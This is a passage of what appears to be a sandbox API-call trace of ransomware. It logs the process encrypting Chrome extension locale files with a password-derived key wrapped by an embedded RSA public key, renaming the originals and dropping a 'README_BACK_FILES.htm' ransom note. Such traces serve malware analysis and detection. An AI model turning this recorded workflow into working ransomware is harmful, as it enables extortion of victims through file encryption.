pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.764] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.764] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.764] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.764] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.764] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.764] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.765] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.765] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.765] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.765] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.765] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.765] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.765] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.765] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.765] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.765] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.765] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.765] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.765] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.765] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.766] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.766] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.766] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.766] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.766] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.766] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x1fa, lpOverlapped=0x0) returned 1 [0262.766] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x1fa, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x200) returned 1 [0262.766] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x200, lpOverlapped=0x0) returned 1 [0262.766] CloseHandle (hObject=0x5d5c) returned 1 [0262.766] CloseHandle (hObject=0x5d60) returned 1 [0262.766] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\en\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\en\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\en\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\en\\messages.json"), bFailIfExists=0) returned 1 [0262.769] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\en\\messages.json", dwFileAttributes=0x0) returned 1 [0262.770] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\en\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\en\\messages.json.gsg")) returned 1 [0262.771] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\en\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\en\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\en\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\en\\messages.json.fuck")) returned 1 [0262.772] CryptDestroyHash (hHash=0x2e7fd40) returned 1 [0262.772] CryptDestroyKey (hKey=0x2e7de00) returned 1 [0262.772] CryptReleaseContext (hProv=0x2e7a500, dwFlags=0x0) returned 1 [0262.772] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0262.773] FindClose (in: hFindFile=0x2e7fc40 | out: hFindFile=0x2e7fc40) returned 1 [0262.773] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\en\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\en\\readme_back_files.htm")) returned 0xffffffff [0262.773] AreFileApisANSI () returned 1 [0262.773] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x275c330, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 162 [0262.773] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\en\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\en\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0262.774] GetFileType (hFile=0x5d64) returned 0x1 [0262.774] WriteFile (in: hFile=0x5d64, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0262.775] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0262.775] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\es\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e7fc40 [0262.775] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0262.775] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0262.775] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0262.776] GetLastError () returned 0x0 [0262.776] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\es\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\es\\messages.json")) returned 0x20 [0262.776] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\es\\messages.json", dwFileAttributes=0x80) returned 1 [0262.776] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\es\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\es\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0262.777] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\es\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\es\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0262.778] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\es\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0262.779] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e7a500) returned 1 [0262.781] CryptCreateHash (in: hProv=0x2e7a500, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0262.781] lstrlenA (lpString="nyVZwrEPeJcSGZnLzNUpNIeDzMlQm") returned 29 [0262.781] CryptHashData (hHash=0x2e7fd40, pbData=0x28cb6e8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0262.781] CryptDeriveKey (in: hProv=0x2e7a500, Algid=0x6610, hBaseData=0x2e7fd40, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e7da00) returned 1 [0262.781] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----o", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0262.781] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0262.781] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e73b48) returned 1 [0262.782] CryptImportPublicKeyInfo (in: hCryptProv=0x2e73b48, dwCertEncodingType=0x1, pInfo=0x2ead350*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2ead380*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2ead388*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e7e580) returned 1 [0262.782] CryptEncrypt (in: hKey=0x2e7e580, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0262.782] CryptEncrypt (in: hKey=0x2e7e580, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e746f8*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e746f8*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0262.782] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2e746f8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e746f8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0262.783] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.785] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.786] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.797] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.797] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.797] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.797] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.797] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.797] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.797] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.797] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.797] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.798] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.798] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.798] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.798] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.798] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.798] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.798] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.798] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.798] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.798] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.798] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.798] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.798] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.798] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.799] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.799] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.799] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.799] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.799] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.799] 